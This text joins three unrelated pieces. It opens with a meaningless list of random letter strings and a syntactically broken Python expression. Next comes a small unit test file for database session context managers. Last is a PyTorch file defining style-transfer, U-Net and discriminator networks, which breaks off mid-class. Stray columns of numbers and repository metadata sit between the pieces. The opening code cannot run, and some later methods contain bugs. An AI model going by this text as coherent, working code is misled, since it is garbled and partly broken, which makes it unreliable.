'pwbfdmtc jms gswg wvsscb ffq lbrhbn lcxc hcr thc mghts vkgfc nrvfgs dsrdq tcmfz scqskgsl twgzh whts dqt twtksl lcrdlc dpzrl hwlqvc xcfstz rfkvbr bzmvqp qxrs jlmwtcs nmjkkmpg kbcbg shdf qxpm qbm hlcnqnw jwhvvrtr kccw njxtbh hbtn lqmxbx krnn hcv ptqtwp xgnfggb bjdd nfgkxsw kgzcf bgncx rbsfrrcf vjwsjpw jbtcbqm xhhg kfpqcpx bfxlg qddzdv rvfqp hphjhns xhk npdd gsxm ffkbj gwdxkhr ddqmr jnzznp jzsgkb lcgsgjvh xvsbdw klzsxz xpjkjxc gth dtrmkn qzcsksd vsdrhj vtlxg kdtxsj sgs chnz bdllcsdl trggnlpd gwbvj stnhs vqbhj tdhps sgkk mxnswm ghm sqhfcnlk lpwqpn gcgg mjxh prmqclss zfn gplktxj vkjnkkv fzzx vdslwsdk fxt pnbqqbk ksfgcvw hxfq xxd rvqzhmm ctvfgxzv nrzdkx nsxmr bnvkmhcl srvc nczkp zbgsxg nmpx vrqq xfmnsjc zszmrfjv cbwjfldn fgn mzpp crjnct cmh cwh cvdk cslq tvr gggck pfs thfdcpxt fcffvg bwxr bstbzwsx ghhq ldzzlkg zmfkxvms lfn zzzfchrk lktdlrlx wzjcvj nbbkqjt lthk wnxsmnx dzftkjr fqfqcjtd dzsvqbnx zhprp cqlphsk cjvrwg fkhr mxrg tdbxnwrg sdcptlln tjsh vbmd vlgfskcx xtkdp ttjcc qtlmgsh kbndtscg nfw kctx rcltszw hbjr zld npqqm bpcqrhq szzw vbxj ghhmdq nhfptrsg vpkgwcd rkkxqk jhxpngr qnkfd wvcsmb bgnvwqln gfbrqn rjjp dvfqjqsf rspxz cvrjxjq gtps fbg rdp pbzqnc nssd rrpzcwp drfrgjx wvcpw fst frp lmz gbb brzbhlns qsjgzzzp jwvbhl pchqk vhpbdwd mwtlm wbdxk rsfpxl kqt psr bcdktps mrgnflhr fvxsmsbx rqprpvj clnr hdqzjc bndwhjwp fbbkvdhr mlgtjw ntk pxv nsnv jnwp vtksnpbb lpwl rslljk hsd rzfmdp xlbnkbw ptfhnlc jjc dpptqzc jgrt jgxn bgg hslbhksz lhld jfdjq mmttm hwjbnqwv dcxggwhc dcnhhltm fttbf xjnjhgh tchctgjn fvjkmj wkfxqzkx knbhrwgs xmszj smnrwmlv cdbdwsjf grtkzrwh rwmbvt zssswpc cdvr klhtb bhkwfwxm bdjzlg nnw hnw fkm dzxpk fmvx kwfj vbf bgp frfbhk kvqwc skddwrtg brgkfqnf xmwth wrmv rzmjrbfb pkj hckr sfbvz vtfbq fmzf tkhnb srd slkbcmj ppq kxgdbxhh grwpg hxhjznc ttmgnwb lljfz ftkgv fsjmrvcx dljps mtgnc bkwfwfnj npfvr qlgpv hmqhxfpb vvwtkrf nfchzb phmhxkck ngrngr lvd dgbwpk txlttnpb ppldgl wsmngb xtxsblgt xxtctgsj pbvtkm pmcmrmvf phcxvpf wtbfv mvclz dvsl tmzxrrg gbjz dtlsp klmjxg fxh svtlgdl vvlhntpt zgtkjdm lbjrnmt fbbhqvg dwqnsgj bjjcsvms tlpzlxj bcw rtvmzn kjtqpxhw zkvkdxz dcx zqmsnl rvqw kgsh gbwdh wslrbz pfnpqh mgj kgmq hpzmp kpr jgz bksx lvsbxzv qgzf qcgpc pvf xlt znjntxpj stgwsc vxgcfc cbvwhf tbxwpk nbjbkrz rgc wps rjlfpch bxqhw nckdtf bsncq cnsmqxwn mzmlgpp vnxr qgjs vpkpbsn tgmw lbcxxgsf nnmr wbpdssgm nmddl zcbpcbpt twrkx sdqxsnw lntr rzv hgjjksxf qpnnjwl hbcv fkwkbd ncv plr lmpfkk dpcj jzjbjgp bdttl wrrdnmjz mxqxqdxc shztl gdzj rntpnh rjrlrfk rncp qlrhnww rdzhzx qnnxhm gtd lqklxr gpgpqtrc hfhp hxl bnr fpvxzwmx pfrxglb xmchrvwx wbnxl vjxgbs vddhjkq wndwxs mqndvm hvbncjw pbmlw hzjwqn nfgxqmb pfvnpwj xbwknvmr xtm cnxck qnmtrvx kmhj hdfrtd gqz srlml ckx pwlhnpgf rkln tvq vjgrlfs vpvwnjtg wbswcvbh dzcjppjm slt zvxhgq xhcvvc rjd xhqdvhmp nqlnsk hxmjpmnv sjwwc hbjvpw dpmdnz sxpb qznnxl nwnlmbx vdb hgkkwd znsxfqs kqwjtrcg vhbnd rpgtkzz fmt nmzhrrqn qbqbvpsm kqwxr gvp xvrvsdf pxwt vkdns dpf jwnwz mxpwc xdvs drrlpnr xvpztf pxzm jtg fvfgnzx qndpq dmzwnfgm jzknzgk clbpzcpd xhxsqp zbfck btzjd jwbt gwtll kqj wlsdx sdvnw mqpvxk kjdkt frgwz mpqnqr lpj gvc hcdp zpvrdnc ckvmtbvf bddvc mptrq xrzwj lzlbc pvgkrhd wlkdtjz pslzhzhc qmrr crkxcs jtxhfvr qzd fwrgdmjt cmg xvhcb zmllbxs mxg plzxjqlk cwnf mqt hlsssh lvmptxcd zdbsvmll wshnn xzrz xsnhn jhg jtkqhh kcsb bgsfnz mfxmqjn glzb qtwhllw nfkjfn xgw mvssxl hpb vjhlfgld cgfwq qdvjskx ntnhcl ckm rqrsw dpff krrkl mcs xnk jpnx llw ljhqlbhs njdm gph nwmm bcclbzz wjfktwv mgthn kltqfx hqntlps bdr dqtswd vqmkgkb pmznqzh mwgf nndtsx xfrmgqqj mvkfdhh qxp pvpcmx mhnhb slw clvtxn nfpnlr 
tsssrk rnvdjpc ptkp hrwx zgblvhlj lqrdrz bhtlqhvv mlpkx jsl vlj kbmfjgs ktzb wrnn ztbcph lxccgcxh bkrhjtsl cbmhp hwswwqg rnwqq srhnz fkvl kcnr qbxwpg hnss gjdn rnxhwgd jgngwzc kfvg nwkjt rhjtsvv txk szkpmn nnzbqwgs pjjzqkvx bkw dfcbw rffn qph kckksgp nzn tpqnm znzppsg tvcgnrb zgdsp tqlqrf vjqqxsp pwj pgft cvl cvr cnhgxsd lkd qlw vwtbh mfxs gbgw'.split()
if sum(
['jvpwktnblzfhscrgdmqx'.index(WORD[i]) * 20 ** i for i in range(len(WORD))]) >= 752164 and not sum(
['jvpwktnblzfhscrgdmqx'.index(WORD[i]) * 20 ** i for i in range(len(WORD))]) % 3])))
| 993.095238
| 4,000
| 0.81755
| 3,152
| 20,855
| 5.409264
| 0.204949
| 0.003695
| 0.004399
| 0.006158
| 0.988622
| 0.986979
| 0.984633
| 0.983226
| 0.983226
| 0.983226
| 0
| 0.001046
| 0.17473
| 20,855
| 20
| 4,001
| 1,042.75
| 0.9896
| 0
| 0
| 0.15
| 0
| 0.25
| 0.948358
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0.05
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
ed8c1c4d15e5187314908beb104fc9c5e5dd8ce1
| 1,542
|
py
|
Python
|
frontend/tests/api/common/test_sessions.py
|
krisshol/bach-kmno
|
f40d85b3397bb340e26a671c54d4a753dbbb0d43
|
[
"Apache-2.0"
] | 248
|
2015-01-08T09:36:44.000Z
|
2022-01-12T10:29:21.000Z
|
frontend/tests/api/common/test_sessions.py
|
krisshol/bach-kmno
|
f40d85b3397bb340e26a671c54d4a753dbbb0d43
|
[
"Apache-2.0"
] | 50
|
2015-01-09T08:31:57.000Z
|
2022-03-30T10:41:13.000Z
|
frontend/tests/api/common/test_sessions.py
|
krisshol/bach-kmno
|
f40d85b3397bb340e26a671c54d4a753dbbb0d43
|
[
"Apache-2.0"
] | 74
|
2015-01-05T09:11:21.000Z
|
2022-03-29T02:16:54.000Z
|
from unittest import TestCase
from mock import patch
import api.common.sessions as module
from irma.common.base.exceptions import IrmaDatabaseError
class TestSessions(TestCase):
@patch("api.common.sessions.db_session")
def test_transaction(self, m_db_session):
with module.session_transaction():
pass
m_db_session.commit.assert_called()
m_db_session.rollback.assert_not_called()
m_db_session.close.assert_called()
@patch("api.common.sessions.db_session")
def test_transaction_error(self, m_db_session):
exception = IrmaDatabaseError
with self.assertRaises(exception):
with module.session_transaction():
raise exception
m_db_session.commit.assert_not_called()
m_db_session.rollback.assert_called()
m_db_session.close.assert_called()
@patch("api.common.sessions.db_session")
def test_query(self, m_db_session):
with module.session_query():
pass
m_db_session.commit.assert_not_called()
m_db_session.rollback.assert_not_called()
m_db_session.close.assert_not_called()
@patch("api.common.sessions.db_session")
def test_query_error(self, m_db_session):
exception = IrmaDatabaseError
with self.assertRaises(exception):
with module.session_query():
raise exception
m_db_session.commit.assert_not_called()
m_db_session.rollback.assert_not_called()
m_db_session.close.assert_not_called()
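# --- Editorial sketch (not part of the original file) ---
# The assertions above only hold for context managers shaped roughly like the
# reconstructions below; the names, the explicit db_session parameter, and the
# caught exception type are inferred from the tests, not copied from the real
# api.common.sessions module.
from contextlib import contextmanager

@contextmanager
def _session_transaction_sketch(db_session):
    """Commit on success, rollback on IrmaDatabaseError, always close."""
    try:
        yield db_session
        db_session.commit()
    except IrmaDatabaseError:
        db_session.rollback()
        raise
    finally:
        db_session.close()

@contextmanager
def _session_query_sketch(db_session):
    """Read-only scope: no commit, no rollback, no close (per the tests)."""
    yield db_session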
| 33.521739
| 57
| 0.699092
| 192
| 1,542
| 5.270833
| 0.192708
| 0.177866
| 0.158103
| 0.126482
| 0.818182
| 0.818182
| 0.788538
| 0.727273
| 0.727273
| 0.667984
| 0
| 0
| 0.216602
| 1,542
| 45
| 58
| 34.266667
| 0.837748
| 0
| 0
| 0.702703
| 0
| 0
| 0.077821
| 0.077821
| 0
| 0
| 0
| 0
| 0.378378
| 1
| 0.108108
| false
| 0.054054
| 0.108108
| 0
| 0.243243
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
9c0d94ae4a0455ac2d2c82675185efd3d8206704
| 40,714
|
py
|
Python
|
model.py
|
klanita/sigoat
|
941552227639edf38e9b5b745848160ae83f451a
|
[
"MIT"
] | 1
|
2022-03-30T11:31:28.000Z
|
2022-03-30T11:31:28.000Z
|
model.py
|
klanita/sigoat
|
941552227639edf38e9b5b745848160ae83f451a
|
[
"MIT"
] | null | null | null |
model.py
|
klanita/sigoat
|
941552227639edf38e9b5b745848160ae83f451a
|
[
"MIT"
] | null | null | null |
import torch
import torch.utils.data
from torch import nn, optim
from torch.nn import functional as F
from torchvision import datasets, transforms
class StyleNetworkImage(nn.Module):
def __init__(self, inplanes=1, planes=16,
kernel_size=4, stride=2, padding=1,
normalization='instance'):
super(StyleNetworkImage, self).__init__()
if normalization == 'instance':
norm_layer=nn.InstanceNorm2d
else:
norm_layer=nn.BatchNorm2d
self.latent_dim = 1024*2*2
output_padding = (0, 0)
encoder = []
x = inplanes
y = planes
for i in range(7):
encoder += [
nn.Conv2d(x, y, kernel_size, stride, padding),
norm_layer(y),
nn.LeakyReLU(0.2)]
x = y
y = y*2
encoder += [nn.Flatten()]
self.encoder = nn.Sequential(*encoder)
x = 1024
y = 512
output_padding = (0, 0)
decoder = [nn.Unflatten(1, (x, 2, 2))]
decoder_style = [nn.Unflatten(1, (x, 2, 2))]
for i in range(7):
decoder += [
nn.ConvTranspose2d(x, y, kernel_size, stride, padding,\
output_padding, bias=False),
norm_layer(y),
nn.LeakyReLU(0.2)]
decoder_style += [
nn.ConvTranspose2d(x, y, kernel_size, stride, padding,\
output_padding, bias=False),
norm_layer(y),
nn.LeakyReLU(0.2)]
# if i == 3:
# output_padding = (0, 0)
x = y
y = y//2
decoder += [nn.Conv2d(8, 1, 3, 1, 1)]
self.decoder = nn.Sequential(*decoder)
decoder_style += [nn.Conv2d(8, 1, 3, 1, 1)]
self.decoder_style = nn.Sequential(*decoder_style)
self.mu = nn.Embedding(1, self.latent_dim)
self.logvar = nn.Embedding(1, self.latent_dim)
self.logvar.weight.data[0] = torch.zeros(
[1, self.latent_dim], requires_grad=False)
def forward(self, imgs, real=False):
z_s = self.encode(imgs)
return self.decode(z_s, real=real)
def encode(self, imgs):
return self.encoder(imgs)
    def encode_with_style(self, imgs, real=False):
        # fix: z_s was referenced before assignment in the original
        z_s = self.encoder(imgs)
        if real:
            return z_s + self.sample(z_s.shape)
        else:
            return z_s
def sample(self, s):
std = torch.exp(self.logvar.weight[0].expand(s))
eps = torch.randn_like(std)
return eps * std + self.mu.weight[0].expand(s)
def decode(self, z_s, real=False):
if real:
return self.decoder_style(z_s + self.sample(z_s.shape))
else:
return self.decoder(z_s)
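# Editorial note (not in the original file): with the defaults above,
# StyleNetworkImage is shape-consistent for (N, 1, 256, 256) inputs: seven
# stride-2 convs reach 1024 channels at 2x2 (latent_dim = 1024*2*2 = 4096),
# and the mirrored decoder returns to 256x256.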
class unet_block(nn.Module):
def __init__(self,
in_channels,
out_channels,
inner_block=None,
kernel_size=4,
stride=2,
padding=1,
output_padding=(0, 0),
outermost=False,
innermost=False,
norm_layer=nn.InstanceNorm2d):
super().__init__()
self.outermost = outermost
if inner_block is None:
down_block = nn.Sequential(
nn.Conv2d(in_channels, out_channels, kernel_size, stride, padding=(1, 0)),
norm_layer(out_channels),
nn.LeakyReLU(0.2)
)
else:
down_block = nn.Sequential(
nn.Conv2d(in_channels, out_channels, kernel_size, stride, padding),
norm_layer(out_channels),
nn.LeakyReLU(0.2)
)
if outermost:
in_channels = 16
up_block = nn.Sequential(
nn.ConvTranspose2d(out_channels, in_channels, kernel_size, stride, padding,\
output_padding, bias=False),
norm_layer(in_channels),
nn.LeakyReLU(0.2))
else:
up_block = nn.Sequential(
nn.ConvTranspose2d(out_channels, int(in_channels), kernel_size, stride, padding,\
output_padding, bias=False),
norm_layer(in_channels),
nn.LeakyReLU(0.2))
blocks_list = [down_block]
if not (inner_block is None):
blocks_list += [inner_block]
blocks_list += [up_block]
if outermost:
blocks_list += [nn.Conv2d(16, 1, 3, 1, 1)]
self.model = nn.Sequential(*blocks_list)
def forward(self, x):
return self.model(x)
class UNet(nn.Module):
def __init__(self, norm_layer=nn.InstanceNorm2d):
super(UNet, self).__init__()
l1 = unet_block(256, 512, norm_layer=norm_layer, output_padding=(1, 0),
inner_block=None, innermost=True, outermost=False) #inner block
l2 = unet_block(128, 256, norm_layer=norm_layer, output_padding=(1, 0),
inner_block=l1, innermost=False, outermost=False)
l3 = unet_block(64, 128, norm_layer=norm_layer, output_padding=(1, 0),
inner_block=l2, innermost=False, outermost=False)
l4 = unet_block(32, 64, norm_layer=norm_layer, output_padding=(1, 0),
inner_block=l3, innermost=False, outermost=False)
l5 = unet_block(16, 32, norm_layer=norm_layer, output_padding=(0, 0),
inner_block=l4, innermost=False, outermost=False)
self.model = unet_block(1, 16, norm_layer=norm_layer, output_padding=(0, 0),
inner_block=l5, innermost=False, outermost=True)
def forward(self, img):
return self.model(img)
def weights_init(m):
classname = m.__class__.__name__
if classname.find('Conv') != -1:
nn.init.normal_(m.weight.data, 0.0, 0.02)
elif classname.find('BatchNorm') != -1:
nn.init.normal_(m.weight.data, 1.0, 0.02)
nn.init.constant_(m.bias.data, 0)
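# Editorial usage note (not in the original file): weights_init follows the
# DCGAN initialization convention and is meant to be applied recursively,
# e.g.
#     net = UNet()
#     net.apply(weights_init)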
# Number of channels in the training images. For color images this is 3
nc = 3
# Size of z latent vector (i.e. size of generator input)
nz = 7168
# Size of feature maps in generator
ngf = 64
# Size of feature maps in discriminator
ndf = 64
class StyleNetwork(nn.Module):
def __init__(
self, img_size, inplanes=1, planes=16,
kernel_size=4, stride=2, padding=1,
normalization='instance'
):
super(StyleNetwork, self).__init__()
if normalization == 'instance':
norm_layer=nn.InstanceNorm2d
        elif normalization == 'batch':
norm_layer=nn.BatchNorm2d
else:
raise NotImplementedError
if (img_size == 'linear') or (img_size == -1):
# means we run on the whole image
latent=14
output_padding=(1, 0)
dim2 = 2
elif img_size == 'multi':
latent=14
output_padding=(1, 0)
dim2 = 4
        else:
            # means we run on a crop of the image
            output_padding = (0, 0)
            latent = 2
            # fix: dim2 was never set on this branch, so the latent_dim
            # computation below raised NameError; 2 is an assumed value
            dim2 = 2
self.latent_dim = 512*latent*dim2
encoder = []
x = inplanes
y = planes
for i in range(6):
encoder += [
nn.Conv2d(x, y, kernel_size, stride, padding),
norm_layer(y),
nn.LeakyReLU(0.2)]
if x == 1:
x = 16
else:
x = x*2
y = y*2
encoder += [nn.Flatten()]
self.encoder = nn.Sequential(*encoder)
x = 512
y = 256
decoder = [nn.Unflatten(1, (x, latent, dim2))]
decoder_style = [nn.Unflatten(1, (x, latent, dim2))]
for i in range(6):
decoder += [
nn.ConvTranspose2d(x, y, kernel_size, stride, padding,\
output_padding, bias=False),
norm_layer(y),
nn.LeakyReLU(0.2)]
decoder_style += [
nn.ConvTranspose2d(x, y, kernel_size, stride, padding,\
output_padding, bias=False),
norm_layer(y),
nn.LeakyReLU(0.2)]
if i == 3:
output_padding = (0, 0)
x = x//2
if y != 16:
y = y//2
decoder += [nn.Conv2d(16, 1, 3, 1, 1)]
self.decoder = nn.Sequential(*decoder)
decoder_style += [nn.Conv2d(16, 1, 3, 1, 1)]
self.decoder_style = nn.Sequential(*decoder_style)
self.mu = nn.Embedding(1, self.latent_dim)
self.logvar = nn.Embedding(1, self.latent_dim)
self.logvar.weight.data[0] = torch.zeros(
[1, self.latent_dim], requires_grad=False)
def forward(self, imgs, real=False):
z_s = self.encode(imgs)
return self.decode(z_s, real=real)
def encode(self, imgs):
return self.encoder(imgs)
    def encode_with_style(self, imgs, real=False):
        # fix: z_s was referenced before assignment in the original
        z_s = self.encoder(imgs)
        if real:
            return z_s + self.sample(z_s.shape)
        else:
            return z_s
def sample(self, s):
std = torch.exp(self.logvar.weight[0].expand(s))
eps = torch.randn_like(std)
return eps * std + self.mu.weight[0].expand(s)
def decode(self, z_s, real=False):
if real:
return self.decoder_style(z_s + self.sample(z_s.shape))
else:
return self.decoder(z_s)
class DiscriminatorLatent(nn.Module):
def __init__(self, latent_dim):
super().__init__()
self.latent_dim = latent_dim
# TODO change to flexible architecture
self.linears = nn.Sequential(
# nn.Linear(latent_dim, n_classes),
nn.Linear(latent_dim, 1000),
nn.BatchNorm1d(1000), #remove if needed
nn.LeakyReLU(0.2),
nn.Linear(1000, 500),
nn.LeakyReLU(0.2),
nn.Linear(500, 1),
nn.Sigmoid()
)
def forward(self, z):
return self.linears(z)
class Discriminator(nn.Module):
def __init__(self, img_size=-1, inplanes=1, planes=16, kernel_size=4, stride=2, padding=1,
norm_layer=nn.InstanceNorm2d, patch=True):
super(Discriminator, self).__init__()
if img_size == -1:
# means we run on the whole image
latent=14
else:
latent=2
self.latent_dim = 256*latent
main = []
in_channels = inplanes
out_channels = planes
for i in range(7):
main += [
nn.Conv2d(in_channels, out_channels, kernel_size, stride, padding),
norm_layer(out_channels),
nn.LeakyReLU(0.2),
nn.Dropout(0.5)]
if in_channels == 1:
in_channels = 16
else:
in_channels = in_channels*2
if out_channels != 512:
out_channels = out_channels*2
if patch:
main += [nn.Flatten(), nn.Sigmoid()]
else:
main += [nn.Flatten(), nn.Linear(self.latent_dim, 1), nn.Sigmoid()]
self.main = nn.Sequential(*main)
def forward(self, input):
return self.main(input)
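# Editorial note (not in the original file): with patch=True the head is a
# per-element sigmoid over the final feature map (PatchGAN-style local
# scores); patch=False instead flattens and applies a single Linear for one
# score per image.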
class DiscriminatorSides(nn.Module):
def __init__(self, inplanes=1, planes=16, kernel_size=4, stride=2, padding=1,
norm_layer=nn.InstanceNorm2d):
super(DiscriminatorSides, self).__init__()
self.main = nn.Sequential(
nn.Conv2d(1, 16, 4, 2, 1),
nn.InstanceNorm2d(16),
nn.LeakyReLU(0.2),
nn.Conv2d(16, 32, 4, 2, 1),
nn.InstanceNorm2d(32),
nn.LeakyReLU(0.2),
nn.Conv2d(32, 64, 4, 2, 1),
nn.InstanceNorm2d(64),
nn.LeakyReLU(0.2),
nn.Conv2d(64, 128, 4, 2, 1),
nn.InstanceNorm2d(128),
nn.LeakyReLU(0.2),
nn.Conv2d(128, 256, 4, 2, 1),
nn.InstanceNorm2d(256),
nn.LeakyReLU(0.2),
nn.Conv2d(256, 512, 4, 2, 1), # 512-14-4
nn.InstanceNorm2d(512),
nn.LeakyReLU(0.2),
nn.Sigmoid())
def forward(self, input):
return self.main(input)
class SidesReconstruction(nn.Module):
# def __init__(self, latent_dim=14336, n_label=2):
def __init__(self, latent_dim=14336, img_size=-1, inplanes=1, planes=16,
kernel_size=4, stride=2, padding=1,
norm_layer=nn.InstanceNorm2d):
super().__init__()
self.latent_dim = latent_dim
self.encoder = nn.Sequential(
nn.Conv2d(1, 16, 4, 2, 1),
nn.InstanceNorm2d(16),
nn.LeakyReLU(0.2),
nn.Conv2d(16, 32, 4, 2, 1),
nn.InstanceNorm2d(32),
nn.LeakyReLU(0.2),
nn.Conv2d(32, 64, 4, 2, 1),
nn.InstanceNorm2d(64),
nn.LeakyReLU(0.2),
nn.Conv2d(64, 128, 4, 2, 1),
nn.InstanceNorm2d(128),
nn.LeakyReLU(0.2),
nn.Conv2d(128, 256, 4, 2, 1),
nn.InstanceNorm2d(256),
nn.LeakyReLU(0.2),
# nn.Conv2d(256, 512, 4, 2, (1, 0)), # 512-14-4
# nn.InstanceNorm2d(512),
# nn.LeakyReLU(0.2),
# nn.Conv2d(512, 512, 4, 2, 1), # 512-14-4
# nn.InstanceNorm2d(512),
# nn.LeakyReLU(0.2),
)
self.sides_head_center = nn.Sequential(
nn.Conv2d(256, 512, 4, 2, 1), # 512-14-4
nn.InstanceNorm2d(512),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(512, 256, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
nn.InstanceNorm2d(256),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(256, 128, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
nn.InstanceNorm2d(128),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(128, 64, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
nn.InstanceNorm2d(64),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(64, 32, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
nn.InstanceNorm2d(32),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(32, 16, 4, stride=2, padding=1, bias=False),
nn.InstanceNorm2d(16),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(16, 16, 4, stride=2, padding=1, bias=False),
nn.InstanceNorm2d(16),
nn.LeakyReLU(0.2),
nn.Conv2d(16, 1, 3, 1, 1)
)
self.sides_head_left = nn.Sequential(
nn.Conv2d(256, 512, 4, 2, (1, 0)), # 512-14-4
nn.InstanceNorm2d(512),
nn.LeakyReLU(0.2),
# nn.Flatten(),
# nn.Linear(latent_dim, 7168),
# nn.LeakyReLU(0.2),
# nn.Unflatten(1, (512, 14, 1)),
nn.ConvTranspose2d(512, 256, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
nn.InstanceNorm2d(256),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(256, 128, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
nn.InstanceNorm2d(128),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(128, 64, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
nn.InstanceNorm2d(64),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(64, 32, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
nn.InstanceNorm2d(32),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(32, 16, 4, stride=2, padding=1, bias=False),
nn.InstanceNorm2d(16),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(16, 16, 4, stride=2, padding=1, bias=False),
nn.InstanceNorm2d(16),
nn.LeakyReLU(0.2),
nn.Conv2d(16, 1, 3, 1, 1)
)
self.sides_head_right = nn.Sequential(
nn.Conv2d(256, 512, 4, 2, (1, 0)), # 512-14-4
nn.InstanceNorm2d(512),
nn.LeakyReLU(0.2),
# nn.Flatten(),
# nn.Linear(latent_dim, 7168),
# nn.LeakyReLU(0.2),
# nn.Unflatten(1, (512, 14, 1)),
nn.ConvTranspose2d(512, 256, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
nn.InstanceNorm2d(256),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(256, 128, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
nn.InstanceNorm2d(128),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(128, 64, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
nn.InstanceNorm2d(64),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(64, 32, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
nn.InstanceNorm2d(32),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(32, 16, 4, stride=2, padding=1, bias=False),
nn.InstanceNorm2d(16),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(16, 16, 4, stride=2, padding=1, bias=False),
nn.InstanceNorm2d(16),
nn.LeakyReLU(0.2),
nn.Conv2d(16, 1, 3, 1, 1)
)
def forward(self, imgs):
z_s = self.encoder(imgs)
reconsts_center = self.decode(z_s, sides='center').clone().detach()
reconsts_left = self.decode(z_s, sides='left').clone().detach()
reconsts_right = self.decode(z_s, sides='right').clone().detach()
reconsts = torch.cat((reconsts_left, reconsts_center, reconsts_right), 3)
return reconsts
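    # Editorial note (not in the original file): the .clone().detach() calls
    # above cut the autograd graph, so this forward pass cannot backpropagate
    # into the encoder; use encode()/decode() directly to keep gradients.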
def encode(self, imgs):
z_s = self.encoder(imgs)
return z_s
def decode(self, z_s, sides='center'):
if sides == 'right':
reconsts = self.sides_head_right(z_s)
elif sides == 'left':
reconsts = self.sides_head_left(z_s)
elif sides == 'center':
reconsts = self.sides_head_center(z_s)
else:
raise NotImplementedError
return reconsts
class SidesDecoder(nn.Module):
# def __init__(self, latent_dim=14336, n_label=2):
def __init__(self, latent_dim=14336, img_size=-1, inplanes=1, planes=16,
kernel_size=4, stride=2, padding=1,
norm_layer=nn.InstanceNorm2d):
super().__init__()
self.latent_dim = latent_dim
self.sides_head_left = nn.Sequential(
nn.Flatten(),
nn.Linear(latent_dim, 7168),
nn.LeakyReLU(0.2),
nn.Unflatten(1, (512, 14, 1)),
nn.ConvTranspose2d(512, 256, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
nn.InstanceNorm2d(256),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(256, 128, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
nn.InstanceNorm2d(128),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(128, 64, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
nn.InstanceNorm2d(64),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(64, 32, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
nn.InstanceNorm2d(32),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(32, 16, 4, stride=2, padding=1, bias=False),
nn.InstanceNorm2d(16),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(16, 16, 4, stride=2, padding=1, bias=False),
nn.InstanceNorm2d(16),
nn.LeakyReLU(0.2),
nn.Conv2d(16, 1, 3, 1, 1)
)
self.sides_head_right = nn.Sequential(
nn.Flatten(),
nn.Linear(latent_dim, 7168),
nn.LeakyReLU(0.2),
nn.Unflatten(1, (512, 14, 1)),
nn.ConvTranspose2d(512, 256, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
nn.InstanceNorm2d(256),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(256, 128, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
nn.InstanceNorm2d(128),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(128, 64, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
nn.InstanceNorm2d(64),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(64, 32, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
nn.InstanceNorm2d(32),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(32, 16, 4, stride=2, padding=1, bias=False),
nn.InstanceNorm2d(16),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(16, 16, 4, stride=2, padding=1, bias=False),
nn.InstanceNorm2d(16),
nn.LeakyReLU(0.2),
nn.Conv2d(16, 1, 3, 1, 1)
)
    def forward(self, z_s):
        # fix: SidesDecoder defines no encoder and no 'center' head, so the
        # original forward (self.encoder(imgs) plus decode(..., 'center'))
        # could never run; it now decodes a given latent into the two sides.
        reconsts_left = self.decode(z_s, sides='left').clone().detach()
        reconsts_right = self.decode(z_s, sides='right').clone().detach()
        return torch.cat((reconsts_left, reconsts_right), 3)
def decode(self, z_s, sides):
if sides == 'right':
reconsts = self.sides_head_right(z_s)
elif sides == 'left':
reconsts = self.sides_head_left(z_s)
else:
raise NotImplementedError
return reconsts
class FaderNetwork(nn.Module):
def __init__(
self,
latent_dim=14336,
n_label=2,
normalization='batch'):
super().__init__()
self.latent_dim = latent_dim
if normalization == 'instance':
norm_layer=nn.InstanceNorm2d
else:
norm_layer=nn.BatchNorm2d
self.encoder = nn.Sequential(
